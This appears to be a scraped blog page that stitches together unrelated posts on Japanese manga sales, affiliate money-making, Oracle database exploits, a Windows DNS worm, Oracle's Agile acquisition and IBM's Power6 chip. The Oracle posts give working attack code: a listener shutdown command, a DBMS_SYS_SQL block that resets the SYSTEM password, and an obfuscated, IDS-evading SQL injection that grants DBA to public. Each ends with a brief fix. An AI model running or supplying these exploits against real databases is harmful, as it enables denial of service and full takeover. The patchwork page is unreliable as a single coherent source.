The Rise of Japanese Manga Japan

Japan has become the world leader in comics. Japanese manga, as comics are called here, have been publicized the world over on television and in newspapers and the most popular works have been introduced abroad both through legal and pirate translations. But despite these efforts, they remain insufficient for foreign audiences wishing to acquire a comprehensive understanding of the genre. In the months that follow I intend to give a wide-ranging introduction to Japanese manga based on theme, but before I do I should like to begin with an overview of the basics.

There are a great number of magazines in Japan devoted exclusively to manga but it is difficult to give an exact accounting of their number given that it is not at all uncommon for smaller publishing houses to bring out one new magazine after another under different titles. The core of the manga publishing industry consists of some 13 weekly manga magazines published by the major publishers alone, along with 10 biweeklies, and approximately twenty influential monthlies. At any given time there are at least ten magazines which boast over one million copies of each issue. At most there is one non-manga magazine in Japan which can claim a readership of over one million.

Yearly sales of manga throughout the 1990's have been in the neighborhood of 600 billion yen, including 350 billion in magazine sales and 250 billion in paperbacks. These figures do no not include sales of manga appearng in general magazines and newspapers. The total sales of published material in Japan (including magazines and books but excluding newspapers) is two trillion five-hundred billion yen, of which manga sales account for nearly one quarter. Given a total Japanese population of 120 million, we can calculate that the average Japanese spends approximately 2,000 yen per year on manga in one form or another.

The three largest publishing houses producing manga are Kodansha, Shogakkan, and Shueisha. In addition there are some ten odd publishing firms which come in at a close second, including Akita Shoten, Futabasha, Shonen Gahosha, Hakusensha, Nihon Bungeisha, and Kobunsha. This is not even to mention the countless other small-scale publishing firms. The larger publishers mentioned above also publish magazines and books in areas outside of manga.

It is estimated that there are around 3000 professional manga artists in Japan. All of these individuals have published at least one volume of manga, but most of them make their living as assistants to famous manga artists or have some other supplementary source of income. Only 300 of these, or ten percent of the total, are able to make an above-average living from manga alone. In addition, there are also a great number of amateur manga artists who produce small magazines intended for private circulation, called dojinshi Read More..

Making Money online by building a Website

Do you have a website? and want make them all as a money machine?
Making Money online using your PC which is connected to the Internet at home by building a Website has never been easier. When you build a Website that has enough visitors, say 1000 visitors per day, you can make decent money from Affiliate programs and advertising agencies who advertise for their clients and look for publishers, ie Websites on the Internet.

Work from home, make money from your Website, join affiliate programs, get paid to take online surveys, get paid by reading email, get paid by surfing the Web, money making tutorials, earn revenue by placing ads on your Website, advertisement programs, get a fee to refer customers, receive commission for offering custom builds, etc.

Affiliate Programs (or Associates as some programs call them) make money by referring their site's visitors to the Affiliate program Website (e.g. amzon.com). Your site will be provided with a special ID and whenever a visitor of you site clicks on the affiliate ad, that ID is passed to the Affiliate program manager. Now, how you get paid differs from Affiliate to another.

Some Affiliates pay you when your visitors buy products from their sites, others, pay you for clicking on ads shown at your site.

This site will help you build your online business by showing you how and where to start this new invention in your life. We recommend assessing your own capabilities of building a Website, investigate buying one if your skills or more with marketing rather than technical. Read More..

Oracle Exploit stop TNS Listener via lsnrctl

If a TNS listener is not password protected everybody can stop the TNS listener (Denial of Service) by sending a STOP command to the TNS listener. This can be done with the lsnrctl command, the tnscmd perl script or via tnsnames.ora.

Even if your TNS listener is protected by a firewall and only accessible via HTTP (e.g. from an application server) it is possible to shutdown the listener,e .g. via iSQLPlus or Oracle Forms, Oracle Reports ...

Example
-- use the IP addess of the database server
lsnrctl stop 192.22.33.44

Solution
Protect your TNS Listener with a password and ADMIN_RESTRICTIONS in the listener.ora Read More..

Become DBA via Oracle DBMS_SYS_SQL in Oracle 8i / 9i / 10g

The following test case is from Oracle itself. A test case is nothing else than an exploit or proof of concept code. This test case allows to become DBA if the permission on DBMS_SYS_SQL are granted . By default only XDB has execute permission. Sometimes PORTAL30, PORTAL30_SSO and OAS_PUBLIC has also execute permission on DBMS_SYS_SQL.

Metalink note 112271.1 gives the following advice:

grant execute privileges on DBMS_SYS_SQL to the (default user) OAS_PUBLIC.

BE CAREFUL DOING THIS...

Example
declare
uid number;
sqltext varchar2(100) := 'alter user system identified by hacker';
myint integer;

begin
select user_id into uid from all_users where username like 'SYSTEM';

myint:=sys.dbms_sys_sql.open_cursor();
sys.dbms_sys_sql.parse_as_user(myint,sqltext,dbms_sql.native,UID);

sys.dbms_sys_sql.close_cursor(myint);
end ;
/

Solution
Never grant DBMS_SYS_SQL to public. Read More..

SQL Injection via OracleKUPV$FT in Oracle 10g R1 with IDS evasion

The following proof of concept exploit code injects code for a privilege escalation (grant dba to public) via a cursor. The cursor is executed in the SYS context and grants the DBA permission to public and revokes the privileges directly after that. The advantage of this approach is that the current session has still DBA privileges but this is not visible in the Oracle view DBA_ROLE_PRIVS.

If you compare this exploit code with the exploit from Andrea Purificato you will see that this exploits has less prerequisites (perl is not required, works via isqlplus, smaller and IDS evasion)

Example -- with IDS evasion --
/

SQL> DECLARE
MYC NUMBER;
MYB BOOLEAN;
BEGIN
MYC := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(MYC,translate('uzikpsz fsprjp pnmghgjgna_msphapimwgh) ozrwh zczinmz wjjzuwpmz (rsphm uop mg fnokwi()igjjwm)zhu)',
'poiuztrewqlkjhgfdsamnbvcxy()=!','abcdefghijklmnopqrstuvwxyz'';:='),0);
MYC:=SYS.KUPV$FT.ATTACH_JOB('',''' AND 1=dbms_sql.execute ('||myc||')--',myb);
END;
/

SQL> set role dba;

SQL> revoke dba from public;


SQL> select * from dba_role_privs where granted_role='DBA';

GRANTEE GRANTED_ROLE ADM DEF
------------------------------ ------------------------------ --- ---
SYS DBA YES YES
WKSYS DBA NO YES
SYSMAN DBA NO YES
SYSTEM DBA YES YES

Solution
Apply the patches mentioned in Oracle Critical Patch Update January 2006. Read More..

Hackers Exploit Windows DNS Vulnerability

According to I.T. security Relevant Products/Services firm Sophos, a worm is exploiting an unpatched zero-day vulnerability in the DNS services of several Windows operating systems.

Also known as Nirbot or Rinbot, the W32/Delbot-AI worm is taking advantage of a vulnerability in the way the Windows DNS Server's Remote Procedure Call (RPC) interface has been implemented. The hackers' worm has been able to exploit the flaw by sending a specially crafted RPC packet to vulnerable servers.

If the worm successfully infects a server, it allows hackers to gain control over the computer, giving them the ability to determine what it does and steal information from unsuspecting users. The worm also can exploit an old vulnerability present in Symantec's antivirus product line, which was patched a year ago.

Laying in Wait

Several security vendors have issued a workaround patch, but word from Microsoft Relevant Products/Services on an official patch is sketchy.

"While we don't have a firm estimate on when we'll complete our development and testing of updates for this issue, we have teams around the world working on it 24 hours a day, and hope to have updates no later than May 8, 2007, for the May monthly bulletin release," Chris Budd, of the Microsoft Security Response Center, wrote in the corporate blog.

This flaw in Microsoft's code has only been known for a handful of days, and already there is a worm that is taking advantage of the problem in its attempt to infect as many computers as possible, noted Graham Cluley, senior technology consultant for Sophos.

"Time and time again hackers are forcing companies like Microsoft to scramble around to develop, test, and roll out a software patch," Cluley said in a statement. "Businesses should ensure that their computers are properly configured, and protected with up-to-date antivirus software, hardened firewalls, and patches."

A Watching Eye

The computer underground appears to be reveling in waiting until Microsoft has released its monthly batch of patches before unleashing its latest attacks, continued Cluley. "Microsoft will not be enjoying having the security of their software brought into question again," he concluded.

While the current worm exploits are unsophisticated, there is considerable danger that more sophisticated attacks could be in the works, according Paul Zimski, PatchLink's director of product and market strategy. PatchLink, whose customers include KPMG, Wells Fargo, and Yahoo, has issued an emergency patch ahead of the official Microsoft fix.

"The DNS servers are a particularly high-value target because a hacker that 'owns' DNS servers can do a 'man in the middle' attack," Zimski said. "While this attack isn't going to hit every desktop, it is very serious." Read More..

Oracle Buys Agile in Chess Game with SAP

Enterprise solutions giant Oracle announced Tuesday that it is enlarging its corporate family with the purchase of Agile Software, a company that provides product-lifecycle management (PLM) software.

The acquisition is yet another that Oracle has made in the past few years, buying companies, such as PeopleSoft, to expand its suite of enterprise solutions and to position itself in its rivalry with SAP Relevant Products/Services.

The Agile deal involves a cash merger of $8.10 per share, worth about $495 million.

Managing Products

Engineers, manufacturing, and supply-chain professionals use Agile's solutions to collaborate across the supply chain and to help manage product innovation and product introductions.

The company said in a statement that its products "help customers make better product portfolio decisions, accelerate new product introduction, improve manufacturing quality, and manage regulatory compliance." Regulation compliance includes following rules from the U.S. Food and Drug Administration and the European Union, among others.

The addition of PLM to its suite of enterprise tools will help Oracle further its "strategy of delivering industry-specific enterprise applications," Oracle President Charles Phillips said in a statement. He added that PLM was "one of the fastest growing application segments" and that Agile will "serve as the foundation of our PLM offering."

In an indication of the move's importance in the corporate chess game with SAP, Phillips said that the purchase will "offer yet another strategic application to SAP customers."

SAP's Own Buying Spree

SAP has been on its own strategic buying spree as it also fills out its suite of enterprise solutions. On Monday, it announced that it intended to acquire MaXware and Wicom Communications.

Wicom provides contact center and other business communication software that is entirely IP-based. The current worldwide business environment, SAP said, involves customers connecting through many channels, and the Wicom acquisition can "deliver a multichannel, all-IP, end-to-end contact center solution, integrating communication processes into customer service."

MaXware, this week's other announced purchase by SAP, currently provides services to about 300 customers worldwide. It offers identity management as a service, specializing in standards-based accessibility to confidential information that could reside in several repositories. In particular, it provides identity management in a service-oriented architecture (SOA) world, where a person can have access to many applications across several layers, sometimes only temporarily.

And, last week, SAP announced it is buying OutlookSoft, a performance-management software company.

The Oracle-SAP rivalry extends beyond just competing acquisitions. In March, Oracle sued SAP for stealing copyrighted software. The 43-page suit, filed in U.S. District Court in San Francisco, claimed that the German company repeatedly obtained unauthorized access to its password-protected Web site, using customers' access codes. Read More..

IBM Launches Fastest Processor Ever

IBM broke another chip record Monday and played to its strength in high-performance servers, launching the dual-core Power6 processor. Running at 4.7 GHz, the Power6 is twice as fast as the previous generation of Power5 processors, and is being called the fastest microprocessor ever made.

The Armonk, New York-based company said that the 65-nm Power6 chip uses about the same amount of electricity as its predecessor, meaning that data centers can cut their power use for the same performance, or double the performance at the same power.

The Power6 has a processor bandwidth of 300 GB/sec, Big Blue said, noting that this rate could allow the entire iTunes catalog to be downloaded in 60 seconds. According to IBM, that speed is some 30 times faster than the iTunes-downloading capability of the Intel Itanium processor, which peaks at 1.66 GHz.

IBM's Big Iron Heritage

This kind of "big iron" is IBM's heritage, said Martin Reynolds, an analyst with industry research firm Gartner. The Power6 strengthens IBM's strong position for very high-performance microprocessors for data centers, he said, where Big Blue remains in first place ahead of Sun and Hewlett-Packard.

At the same time that the Power6 was launched, IBM introduced a new 2- to 16-core server, called the IBM System p 570. That server, using the new Power6 chip, placed first in four common Unix benchmarks that measure integer calculations common in business, floating-point calculations used in scientific research, Java performance, and transaction processing.

"This is the first time that a single system has owned all four categories," IBM said.

Green Technology

Electrical power and cooling requirements for data centers are increasingly important issues. The new chip is being touted in some quarters as "green" technology because of its ability to offer faster speeds without drawing more electricity than the earlier Power chips.

Additionally, when the full capabilities of the Power6 are not being used, the chip can be dynamically scaled down and then restored when needed. The chip design also allows it to operate at low voltages, so it can be used in low-power blade servers as well as other environments.

Reynolds expressed reservation about how much power will actually be saved, although he did note that one area of conservation might be that tasks formerly requiring many servers could now be consolidated. IBM claims that the workload of 30 SunFire v890 servers can now be accommodated by one System p 570.

The processing capability of the new chip is due to several advances, IBM said, including a balanced scaling of cache sizes. "The Power6 chip has a total cache size of 8 MB per chip -- four times the Power5 chip," the company said. This allows data to be fed "to the chip at a rate that takes advantage of the processor's speed."

Other firsts that IBM cited include the Power6 being the first Unix microprocessor that uses hardware Relevant Products/Services calculation for decimal floating-point arithmetic. Previously executed in software, this kind of calculation impacts the processing of complex tax or other financial programs. Read More..